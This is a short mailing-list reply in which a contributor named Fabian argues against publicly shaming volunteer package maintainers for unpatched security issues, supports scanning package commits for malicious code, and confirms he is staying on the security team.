On 08/10/2018 04:41 PM, Huzaifa Sidhpurwala wrote:
We also discussed sharing stats about maintainers who dont patch
security issues (some sort of public shaming).
After some thoughts I'm still not a big fan of the public shaming
approach. There are a lot of non-Red Hat employees who are doing package
maintenance on a voluntary base. Putting community members on display
for not doing something for whatever reason will send the wrong signal.
We want their support. Thus we should try to establish ways to support
them.
3. Scan commits for existing packages to ensure no malicious code is
being introduced:
Have not quite figured this out yet, but it seems this is doable.
Adding additional checks should definitely be something that's
considered. This could become a close cooperation with the FPC because
it would be much easier if those guys are on our side.
Lastly if any one is not interested in continuing their contribution
to
security team, do let me know.
Well, I'm still in.
Kind regards,
Fabian